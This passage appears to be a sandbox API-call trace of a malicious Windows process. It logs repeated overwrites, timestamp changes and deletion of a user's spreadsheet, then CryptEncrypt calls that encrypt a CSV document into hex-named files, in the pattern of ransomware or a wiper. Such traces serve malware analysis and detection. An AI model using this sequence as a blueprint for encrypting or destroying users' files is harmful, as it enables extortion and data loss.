(dwNewMode=0x1, lpOldMode=0x1bf5d0a0) returned 1 [0076.747] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\xvA17L8R.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\fqqwpd4u\\xva17l8r.xlsx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0076.747] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d010) returned 1 [0076.747] SetFilePointer (in: hFile=0x36c, lDistanceToMove=0, lpDistanceToMoveHigh=0x1bf5d208*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x1bf5d208*=0) returned 0x0 [0076.748] WriteFile (in: hFile=0x36c, lpBuffer=0x22bd998*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5d1d8, lpOverlapped=0x0 | out: lpBuffer=0x22bd998*, lpNumberOfBytesWritten=0x1bf5d1d8*=0x1000, lpOverlapped=0x0) returned 1 [0076.748] WriteFile (in: hFile=0x36c, lpBuffer=0x22bd998*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5d1d8, lpOverlapped=0x0 | out: lpBuffer=0x22bd998*, lpNumberOfBytesWritten=0x1bf5d1d8*=0x1000, lpOverlapped=0x0) returned 1 [0076.749] WriteFile (in: hFile=0x36c, lpBuffer=0x22bd998*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5d1d8, lpOverlapped=0x0 | out: lpBuffer=0x22bd998*, lpNumberOfBytesWritten=0x1bf5d1d8*=0x1000, lpOverlapped=0x0) returned 1 [0076.750] WriteFile (in: hFile=0x36c, lpBuffer=0x22bd998*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5d1d8, lpOverlapped=0x0 | out: lpBuffer=0x22bd998*, lpNumberOfBytesWritten=0x1bf5d1d8*=0x1000, lpOverlapped=0x0) returned 1 [0076.751] WriteFile (in: hFile=0x36c, lpBuffer=0x22bd998*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5d1d8, lpOverlapped=0x0 | out: lpBuffer=0x22bd998*, lpNumberOfBytesWritten=0x1bf5d1d8*=0x1000, lpOverlapped=0x0) returned 1 [0076.751] WriteFile (in: hFile=0x36c, lpBuffer=0x22bd998*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5d1d8, lpOverlapped=0x0 | out: lpBuffer=0x22bd998*, lpNumberOfBytesWritten=0x1bf5d1d8*=0x1000, lpOverlapped=0x0) returned 1 [0076.756] WriteFile (in: hFile=0x36c, lpBuffer=0x22bd998*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5d1d8, lpOverlapped=0x0 | out: lpBuffer=0x22bd998*, lpNumberOfBytesWritten=0x1bf5d1d8*=0x1000, lpOverlapped=0x0) returned 1 [0076.757] WriteFile (in: hFile=0x36c, lpBuffer=0x22bd998*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5d1d8, lpOverlapped=0x0 | out: lpBuffer=0x22bd998*, lpNumberOfBytesWritten=0x1bf5d1d8*=0x1000, lpOverlapped=0x0) returned 1 [0076.757] WriteFile (in: hFile=0x36c, lpBuffer=0x22bd998*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5d1d8, lpOverlapped=0x0 | out: lpBuffer=0x22bd998*, lpNumberOfBytesWritten=0x1bf5d1d8*=0x1000, lpOverlapped=0x0) returned 1 [0076.758] WriteFile (in: hFile=0x36c, lpBuffer=0x22bd998*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5d1d8, lpOverlapped=0x0 | out: lpBuffer=0x22bd998*, lpNumberOfBytesWritten=0x1bf5d1d8*=0x1000, lpOverlapped=0x0) returned 1 [0076.759] WriteFile (in: hFile=0x36c, lpBuffer=0x22bd998*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5d1d8, lpOverlapped=0x0 | out: lpBuffer=0x22bd998*, lpNumberOfBytesWritten=0x1bf5d1d8*=0x1000, lpOverlapped=0x0) returned 1 [0076.760] WriteFile (in: hFile=0x36c, lpBuffer=0x22bd998*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5d1d8, lpOverlapped=0x0 | out: lpBuffer=0x22bd998*, lpNumberOfBytesWritten=0x1bf5d1d8*=0x1000, lpOverlapped=0x0) returned 1 [0076.760] WriteFile (in: hFile=0x36c, lpBuffer=0x22bd998*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5d1d8, lpOverlapped=0x0 | out: lpBuffer=0x22bd998*, lpNumberOfBytesWritten=0x1bf5d1d8*=0x1000, lpOverlapped=0x0) returned 1 [0076.761] WriteFile (in: hFile=0x36c, lpBuffer=0x22bd998*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5d1d8, lpOverlapped=0x0 | out: lpBuffer=0x22bd998*, lpNumberOfBytesWritten=0x1bf5d1d8*=0x1000, lpOverlapped=0x0) returned 1 [0076.762] WriteFile (in: hFile=0x36c, lpBuffer=0x22bd998*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5d1d8, lpOverlapped=0x0 | out: lpBuffer=0x22bd998*, lpNumberOfBytesWritten=0x1bf5d1d8*=0x1000, lpOverlapped=0x0) returned 1 [0076.762] WriteFile (in: hFile=0x36c, lpBuffer=0x22bd998*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5d1d8, lpOverlapped=0x0 | out: lpBuffer=0x22bd998*, lpNumberOfBytesWritten=0x1bf5d1d8*=0x1000, lpOverlapped=0x0) returned 1 [0076.763] WriteFile (in: hFile=0x36c, lpBuffer=0x22bd998*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5d1d8, lpOverlapped=0x0 | out: lpBuffer=0x22bd998*, lpNumberOfBytesWritten=0x1bf5d1d8*=0x1000, lpOverlapped=0x0) returned 1 [0076.763] WriteFile (in: hFile=0x36c, lpBuffer=0x22bd998*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x1bf5d1a8, lpOverlapped=0x0 | out: lpBuffer=0x22bd998*, lpNumberOfBytesWritten=0x1bf5d1a8*=0x400, lpOverlapped=0x0) returned 1 [0076.763] SetFilePointer (in: hFile=0x36c, lDistanceToMove=0, lpDistanceToMoveHigh=0x1bf5d208*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x1bf5d208*=0) returned 0x0 [0076.764] WriteFile (in: hFile=0x36c, lpBuffer=0x22bd998*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5d1d8, lpOverlapped=0x0 | out: lpBuffer=0x22bd998*, lpNumberOfBytesWritten=0x1bf5d1d8*=0x1000, lpOverlapped=0x0) returned 1 [0076.765] WriteFile (in: hFile=0x36c, lpBuffer=0x22bd998*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5d1d8, lpOverlapped=0x0 | out: lpBuffer=0x22bd998*, lpNumberOfBytesWritten=0x1bf5d1d8*=0x1000, lpOverlapped=0x0) returned 1 [0076.765] WriteFile (in: hFile=0x36c, lpBuffer=0x22bd998*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5d1d8, lpOverlapped=0x0 | out: lpBuffer=0x22bd998*, lpNumberOfBytesWritten=0x1bf5d1d8*=0x1000, lpOverlapped=0x0) returned 1 [0076.766] WriteFile (in: hFile=0x36c, lpBuffer=0x22bd998*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5d1d8, lpOverlapped=0x0 | out: lpBuffer=0x22bd998*, lpNumberOfBytesWritten=0x1bf5d1d8*=0x1000, lpOverlapped=0x0) returned 1 [0076.767] WriteFile (in: hFile=0x36c, lpBuffer=0x22bd998*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5d1d8, lpOverlapped=0x0 | out: lpBuffer=0x22bd998*, lpNumberOfBytesWritten=0x1bf5d1d8*=0x1000, lpOverlapped=0x0) returned 1 [0076.815] WriteFile (in: hFile=0x36c, lpBuffer=0x22bd998*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5d1d8, lpOverlapped=0x0 | out: lpBuffer=0x22bd998*, lpNumberOfBytesWritten=0x1bf5d1d8*=0x1000, lpOverlapped=0x0) returned 1 [0076.816] WriteFile (in: hFile=0x36c, lpBuffer=0x22bd998*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5d1d8, lpOverlapped=0x0 | out: lpBuffer=0x22bd998*, lpNumberOfBytesWritten=0x1bf5d1d8*=0x1000, lpOverlapped=0x0) returned 1 [0076.816] WriteFile (in: hFile=0x36c, lpBuffer=0x22bd998*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5d1d8, lpOverlapped=0x0 | out: lpBuffer=0x22bd998*, lpNumberOfBytesWritten=0x1bf5d1d8*=0x1000, lpOverlapped=0x0) returned 1 [0076.817] WriteFile (in: hFile=0x36c, lpBuffer=0x22bd998*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5d1d8, lpOverlapped=0x0 | out: lpBuffer=0x22bd998*, lpNumberOfBytesWritten=0x1bf5d1d8*=0x1000, lpOverlapped=0x0) returned 1 [0076.818] WriteFile (in: hFile=0x36c, lpBuffer=0x22bd998*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5d1d8, lpOverlapped=0x0 | out: lpBuffer=0x22bd998*, lpNumberOfBytesWritten=0x1bf5d1d8*=0x1000, lpOverlapped=0x0) returned 1 [0076.819] WriteFile (in: hFile=0x36c, lpBuffer=0x22bd998*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5d1d8, lpOverlapped=0x0 | out: lpBuffer=0x22bd998*, lpNumberOfBytesWritten=0x1bf5d1d8*=0x1000, lpOverlapped=0x0) returned 1 [0076.819] WriteFile (in: hFile=0x36c, lpBuffer=0x22bd998*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5d1d8, lpOverlapped=0x0 | out: lpBuffer=0x22bd998*, lpNumberOfBytesWritten=0x1bf5d1d8*=0x1000, lpOverlapped=0x0) returned 1 [0076.821] SetFilePointer (in: hFile=0x36c, lDistanceToMove=0, lpDistanceToMoveHigh=0x1bf5d208*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x1bf5d208*=0) returned 0x0 [0076.821] SetFilePointer (in: hFile=0x36c, lDistanceToMove=0, lpDistanceToMoveHigh=0x1bf5d208*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x1bf5d208*=0) returned 0x0 [0076.822] SetFilePointer (in: hFile=0x36c, lDistanceToMove=0, lpDistanceToMoveHigh=0x1bf5d218*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x1bf5d218*=0) returned 0x0 [0076.822] SetEndOfFile (hFile=0x36c) returned 1 [0076.823] SetFilePointer (in: hFile=0x36c, lDistanceToMove=0, lpDistanceToMoveHigh=0x1bf5d218*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x1bf5d218*=0) returned 0x0 [0076.823] CloseHandle (hObject=0x36c) returned 1 [0076.823] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\xvA17L8R.xlsx", nBufferLength=0x105, lpBuffer=0x1bf5cb30, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\xvA17L8R.xlsx", lpFilePart=0x0) returned 0x3e [0076.823] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d010) returned 1 [0076.823] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\xvA17L8R.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\fqqwpd4u\\xva17l8r.xlsx"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0076.823] GetFileType (hFile=0x36c) returned 0x1 [0076.823] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5cf80) returned 1 [0076.823] GetFileType (hFile=0x36c) returned 0x1 [0076.823] SetFileTime (hFile=0x36c, lpCreationTime=0x1bf5d278, lpLastAccessTime=0x0, lpLastWriteTime=0x0) returned 1 [0076.823] CloseHandle (hObject=0x36c) returned 1 [0076.824] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\xvA17L8R.xlsx", nBufferLength=0x105, lpBuffer=0x1bf5cb30, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\xvA17L8R.xlsx", lpFilePart=0x0) returned 0x3e [0076.824] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d010) returned 1 [0076.824] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\xvA17L8R.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\fqqwpd4u\\xva17l8r.xlsx"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0076.824] GetFileType (hFile=0x36c) returned 0x1 [0076.824] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5cf80) returned 1 [0076.824] GetFileType (hFile=0x36c) returned 0x1 [0076.824] SetFileTime (hFile=0x36c, lpCreationTime=0x0, lpLastAccessTime=0x1bf5d278, lpLastWriteTime=0x0) returned 1 [0076.824] CloseHandle (hObject=0x36c) returned 1 [0076.824] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\xvA17L8R.xlsx", nBufferLength=0x105, lpBuffer=0x1bf5cb30, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\xvA17L8R.xlsx", lpFilePart=0x0) returned 0x3e [0076.824] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d010) returned 1 [0076.824] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\xvA17L8R.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\fqqwpd4u\\xva17l8r.xlsx"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0076.824] GetFileType (hFile=0x36c) returned 0x1 [0076.824] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5cf80) returned 1 [0076.824] GetFileType (hFile=0x36c) returned 0x1 [0076.824] SetFileTime (hFile=0x36c, lpCreationTime=0x0, lpLastAccessTime=0x0, lpLastWriteTime=0x1bf5d278) returned 1 [0076.824] CloseHandle (hObject=0x36c) returned 1 [0076.825] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\xvA17L8R.xlsx", nBufferLength=0x105, lpBuffer=0x1bf5cd30, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\xvA17L8R.xlsx", lpFilePart=0x0) returned 0x3e [0076.825] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\xvA17L8R.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\fqqwpd4u\\xva17l8r.xlsx")) returned 1 [0076.825] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\xvA17L8R.xlsx", nBufferLength=0x105, lpBuffer=0x1bf5ce00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\xvA17L8R.xlsx", lpFilePart=0x0) returned 0x3e [0076.825] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\764A3B79CE8938C28E5E470560989124", nBufferLength=0x105, lpBuffer=0x1bf5cbd0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\764A3B79CE8938C28E5E470560989124", lpFilePart=0x0) returned 0x51 [0076.826] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d0b0) returned 1 [0076.826] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\764A3B79CE8938C28E5E470560989124" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\fqqwpd4u\\764a3b79ce8938c28e5e470560989124"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0076.826] GetFileType (hFile=0x36c) returned 0x1 [0076.826] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d020) returned 1 [0076.826] GetFileType (hFile=0x36c) returned 0x1 [0076.826] SetFileTime (hFile=0x36c, lpCreationTime=0x1bf5d318, lpLastAccessTime=0x0, lpLastWriteTime=0x0) returned 1 [0076.826] CloseHandle (hObject=0x36c) returned 1 [0076.826] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\764A3B79CE8938C28E5E470560989124", nBufferLength=0x105, lpBuffer=0x1bf5cbd0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\764A3B79CE8938C28E5E470560989124", lpFilePart=0x0) returned 0x51 [0076.826] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d0b0) returned 1 [0076.826] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\764A3B79CE8938C28E5E470560989124" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\fqqwpd4u\\764a3b79ce8938c28e5e470560989124"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0076.826] GetFileType (hFile=0x36c) returned 0x1 [0076.826] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d020) returned 1 [0076.826] GetFileType (hFile=0x36c) returned 0x1 [0076.826] SetFileTime (hFile=0x36c, lpCreationTime=0x0, lpLastAccessTime=0x1bf5d318, lpLastWriteTime=0x0) returned 1 [0076.826] CloseHandle (hObject=0x36c) returned 1 [0076.826] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\764A3B79CE8938C28E5E470560989124", nBufferLength=0x105, lpBuffer=0x1bf5cbd0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\764A3B79CE8938C28E5E470560989124", lpFilePart=0x0) returned 0x51 [0076.826] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d0b0) returned 1 [0076.827] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\764A3B79CE8938C28E5E470560989124" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\fqqwpd4u\\764a3b79ce8938c28e5e470560989124"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0076.827] GetFileType (hFile=0x36c) returned 0x1 [0076.827] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d020) returned 1 [0076.827] GetFileType (hFile=0x36c) returned 0x1 [0076.827] SetFileTime (hFile=0x36c, lpCreationTime=0x0, lpLastAccessTime=0x0, lpLastWriteTime=0x1bf5d318) returned 1 [0076.827] CloseHandle (hObject=0x36c) returned 1 [0076.827] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\YnO -aU8WOlRIF.csv", nBufferLength=0x105, lpBuffer=0x1bf5ce00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\YnO -aU8WOlRIF.csv", lpFilePart=0x0) returned 0x43 [0076.827] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\YnO -aU8WOlRIF.csv", nBufferLength=0x105, lpBuffer=0x1bf5ce00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\YnO -aU8WOlRIF.csv", lpFilePart=0x0) returned 0x43 [0076.828] CryptImportKey (in: hProv=0x1a5b7510, pbData=0x22c0e80, dwDataLen=0x1c, hPubKey=0x0, dwFlags=0x1, phKey=0x1bf5d120 | out: phKey=0x1bf5d120*=0x1a626ec0) returned 1 [0076.828] CryptContextAddRef (hProv=0x1a5b7510, pdwReserved=0x0, dwFlags=0x0) returned 1 [0076.828] CryptExportKey (in: hKey=0x1a626ec0, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x0, pdwDataLen=0x1bf5d230 | out: pbData=0x0*, pdwDataLen=0x1bf5d230*=0x1c) returned 1 [0076.828] CryptExportKey (in: hKey=0x1a626ec0, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x22c0f70, pdwDataLen=0x1bf5d230 | out: pbData=0x22c0f70*, pdwDataLen=0x1bf5d230*=0x1c) returned 1 [0076.828] CryptImportKey (in: hProv=0x1a5b7510, pbData=0x22c1090, dwDataLen=0x1c, hPubKey=0x0, dwFlags=0x1, phKey=0x1bf5d0f0 | out: phKey=0x1bf5d0f0*=0x1a626ad0) returned 1 [0076.828] CryptContextAddRef (hProv=0x1a5b7510, pdwReserved=0x0, dwFlags=0x0) returned 1 [0076.828] CryptContextAddRef (hProv=0x1a5b7510, pdwReserved=0x0, dwFlags=0x0) returned 1 [0076.828] CryptDuplicateKey (in: hKey=0x1a626ad0, pdwReserved=0x0, dwFlags=0x0, phKey=0x1bf5d0e0 | out: phKey=0x1bf5d0e0*=0x1a626b40) returned 1 [0076.828] CryptContextAddRef (hProv=0x1a5b7510, pdwReserved=0x0, dwFlags=0x0) returned 1 [0076.828] CryptSetKeyParam (hKey=0x1a626b40, dwParam=0x4, pbData=0x22c11d8*=0x1, dwFlags=0x0) returned 1 [0076.828] CryptSetKeyParam (hKey=0x1a626b40, dwParam=0x1, pbData=0x22c1188, dwFlags=0x0) returned 1 [0076.829] CryptDestroyKey (hKey=0x1a626ad0) returned 1 [0076.829] CryptReleaseContext (hProv=0x1a5b7510, dwFlags=0x0) returned 1 [0076.829] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\YnO -aU8WOlRIF.csv", nBufferLength=0x105, lpBuffer=0x1bf5cb50, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\YnO -aU8WOlRIF.csv", lpFilePart=0x0) returned 0x43 [0076.829] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d030) returned 1 [0076.829] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\YnO -aU8WOlRIF.csv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\fqqwpd4u\\yno -au8wolrif.csv"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0076.829] GetFileType (hFile=0x36c) returned 0x1 [0076.829] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5cfa0) returned 1 [0076.829] GetFileType (hFile=0x36c) returned 0x1 [0076.829] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\7AD2170DA0A9AA4CF2545F926E74DE40", nBufferLength=0x105, lpBuffer=0x1bf5cb50, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\7AD2170DA0A9AA4CF2545F926E74DE40", lpFilePart=0x0) returned 0x51 [0076.829] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d030) returned 1 [0076.829] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\7AD2170DA0A9AA4CF2545F926E74DE40" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\fqqwpd4u\\7ad2170da0a9aa4cf2545f926e74de40"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x3a4 [0076.829] GetFileType (hFile=0x3a4) returned 0x1 [0076.829] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5cfa0) returned 1 [0076.829] GetFileType (hFile=0x3a4) returned 0x1 [0076.829] ReadFile (in: hFile=0x36c, lpBuffer=0x22c15b8, nNumberOfBytesToRead=0x14000, lpNumberOfBytesRead=0x1bf5d128, lpOverlapped=0x0 | out: lpBuffer=0x22c15b8*, lpNumberOfBytesRead=0x1bf5d128*=0x14000, lpOverlapped=0x0) returned 1 [0076.831] CryptEncrypt (in: hKey=0x1a626b40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x22d55d0*, pdwDataLen=0x1bf5d180*=0x14000, dwBufLen=0x14000 | out: pbData=0x22d55d0*, pdwDataLen=0x1bf5d180*=0x14000) returned 1 [0076.831] WriteFile (in: hFile=0x3a4, lpBuffer=0x22d55d0*, nNumberOfBytesToWrite=0x14000, lpNumberOfBytesWritten=0x1bf5d118, lpOverlapped=0x0 | out: lpBuffer=0x22d55d0*, lpNumberOfBytesWritten=0x1bf5d118*=0x14000, lpOverlapped=0x0) returned 1 [0076.833] ReadFile (in: hFile=0x36c, lpBuffer=0x22c15b8, nNumberOfBytesToRead=0x14000, lpNumberOfBytesRead=0x1bf5d128, lpOverlapped=0x0 | out: lpBuffer=0x22c15b8*, lpNumberOfBytesRead=0x1bf5d128*=0x21ad, lpOverlapped=0x0) returned 1 [0076.833] CryptEncrypt (in: hKey=0x1a626b40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x22e9610*, pdwDataLen=0x1bf5d180*=0x21a0, dwBufLen=0x21a0 | out: pbData=0x22e9610*, pdwDataLen=0x1bf5d180*=0x21a0) returned 1 [0076.833] WriteFile (in: hFile=0x3a4, lpBuffer=0x22e9610*, nNumberOfBytesToWrite=0x21a0, lpNumberOfBytesWritten=0x1bf5d118, lpOverlapped=0x0 | out: lpBuffer=0x22e9610*, lpNumberOfBytesWritten=0x1bf5d118*=0x21a0, lpOverlapped=0x0) returned 1 [0076.834] ReadFile (in: hFile=0x36c, lpBuffer=0x22c15b8, nNumberOfBytesToRead=0x14000, lpNumberOfBytesRead=0x1bf5d128, lpOverlapped=0x0 | out: lpBuffer=0x22c15b8*, lpNumberOfBytesRead=0x1bf5d128*=0x0, lpOverlapped=0x0) returned 1 [0076.834] CryptEncrypt (in: hKey=0x1a626b40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x22eb7f0*, pdwDataLen=0x1bf5d0c0*=0x10, dwBufLen=0x10 | out: pbData=0x22eb7f0*, pdwDataLen=0x1bf5d0c0*=0x10) returned 1 [0076.834] CryptEncrypt (in: hKey=0x1a626b40, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x22eb840*, pdwDataLen=0x1bf5d0c0*=0x0, dwBufLen=0x10 | out: pbData=0x22eb840*, pdwDataLen=0x1bf5d0c0*=0x10) returned 1 [0076.834] WriteFile (in: hFile=0x3a4, lpBuffer=0x22eb890*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x1bf5d048, lpOverlapped=0x0 | out: lpBuffer=0x22eb890*, lpNumberOfBytesWritten=0x1bf5d048*=0x10, lpOverlapped=0x0) returned 1 [0076.834] CloseHandle (hObject=0x3a4) returned 1 [0076.835] CloseHandle (hObject=0x36c) returned 1 [0076.835] CryptDestroyKey (hKey=0x1a626ec0) returned 1 [0076.835] CryptReleaseContext (hProv=0x1a5b7510, dwFlags=0x0) returned 1 [0076.835] CryptReleaseContext (hProv=0x1a5b7510, dwFlags=0x0) returned 1 [0076.835] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS 